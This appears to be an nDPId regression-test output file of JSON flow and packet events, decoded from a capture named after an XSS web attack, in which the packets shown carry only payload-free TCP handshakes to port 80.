-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7869,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":2,"flow_last_seen":1499347914710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347914710,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhOgBH2BK2nwlzaAScSCY3AAAAgQFtAQCCAoD5lY3ATyEwgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7870,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":556,"flow_packet_id":3,"flow_last_seen":1499347914711,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347914711,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oQ9AAD4GJMmsEAABwKgKMoToAFDafCXNAR9gS4AQAOU34wAAAQEICgE8hMMD5lY3"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":487,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347793575,"flow_last_seen":1499347798838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60990,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347787097,"flow_last_seen":1499347792837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347788375,"flow_last_seen":1499347793837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347789640,"flow_last_seen":1499347794837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7883,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347792291,"flow_last_seen":1499347797838,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347916030,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347917322,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347917322,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34050,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7886,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":1,"flow_last_seen":1499347917322,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917322,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CqdAAD4GuymsEAABwKgKMoUCAFC+4o3oAAAAAKACchAEWwAAAgQFtAQCCAoBPIdPAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7887,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":2,"flow_last_seen":1499347917323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347917323,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhQJ4jpXCvuKN6aAScSCaPgAAAgQFtAQCCAoD5ljEATyHTwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7888,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":557,"flow_packet_id":3,"flow_last_seen":1499347917323,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347917323,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CqhAAD4GuzCsEAABwKgKMoUCAFC+4o3peI6Vw4AQAOU5RQAAAQEICgE8h1AD5ljE"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347918608,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347918608,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34064,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":1,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vWVAAD4GCGusEAABwKgKMoUQAFB11zX0AAAAAKACchCkCgAAAgQFtAQCCAoBPIiRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":2,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347918608,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhRAjuy7Uddc19aAScSD0bgAAAgQFtAQCCAoD5loFATyIkQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7900,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":558,"flow_packet_id":3,"flow_last_seen":1499347918608,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347918608,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vWZAAD4GCHKsEAABwKgKMoUQAFB11zX1I7su1YAQAOWTdgAAAQEICgE8iJED5loF"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347921170,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347921170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34090,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7921,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":1,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rYJAAD4GGE6sEAABwKgKMoUqAFCWpCaTAAAAAKACchCQBAAAAgQFtAQCCAoBPIsRAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":2,"flow_last_seen":1499347921170,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347921170,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhSrhgaXUlqQmlKAScSCpIAAAAgQFtAQCCAoD5lyGATyLEQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":559,"flow_packet_id":3,"flow_last_seen":1499347921171,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347921171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rYNAAD4GGFWsEAABwKgKMoUqAFCWpCaU4YGl1YAQAOVIJwAAAQEICgE8ixID5lyG"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347922471,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347922471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34104,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7930,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":1,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+oRAAD4Gy0usEAABwKgKMoU4AFCzyHbTAAAAAKACchAhTAAAAgQFtAQCCAoBPIxXAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7931,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":2,"flow_last_seen":1499347922471,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347922471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhTjpB7A2s8h21KAScSAnOwAAAgQFtAQCCAoD5l3LATyMVwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7932,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":560,"flow_packet_id":3,"flow_last_seen":1499347922472,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347922472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+oVAAD4Gy1KsEAABwKgKMoU4AFCzyHbU6QewN4AQAOXGQgAAAQEICgE8jFcD5l3L"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347923737,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347923737,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34118,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7942,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":1,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ldBAAD4GMACsEAABwKgKMoVGAFBUeRhDAAAAAKACchDd4QAAAgQFtAQCCAoBPI2TAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7943,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":2,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347923737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhUa68naDVHkYRKAScSBKXQAAAgQFtAQCCAoD5l8HATyNkwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7944,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":561,"flow_packet_id":3,"flow_last_seen":1499347923737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347923737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ldFAAD4GMAesEAABwKgKMoVGAFBUeRhEuvJ2hIAQAOXpZAAAAQEICgE8jZMD5l8H"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347926328,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926328,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":34144,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7960,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":1,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Y4hAAD4GYkisEAABwKgKMoVgAFAOjvOTAAAAAKACchBF2gAAAgQFtAQCCAoBPJAbAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":2,"flow_last_seen":1499347926328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347926328,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhWB82qzsDo7zlKAScSC3fAAAAgQFtAQCCAoD5mGPATyQGwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7962,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":562,"flow_packet_id":3,"flow_last_seen":1499347926329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347926329,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Y4lAAD4GYk+sEAABwKgKMoVgAFAOjvOUfNqs7YAQAOVWhAAAAQEICgE8kBsD5mGP"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":488,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347796130,"flow_last_seen":1499347801839,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32784,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":489,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347797419,"flow_last_seen":1499347802840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":490,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347798713,"flow_last_seen":1499347803840,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":491,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347801271,"flow_last_seen":1499347806841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347802549,"flow_last_seen":1499347807841,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347926880,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 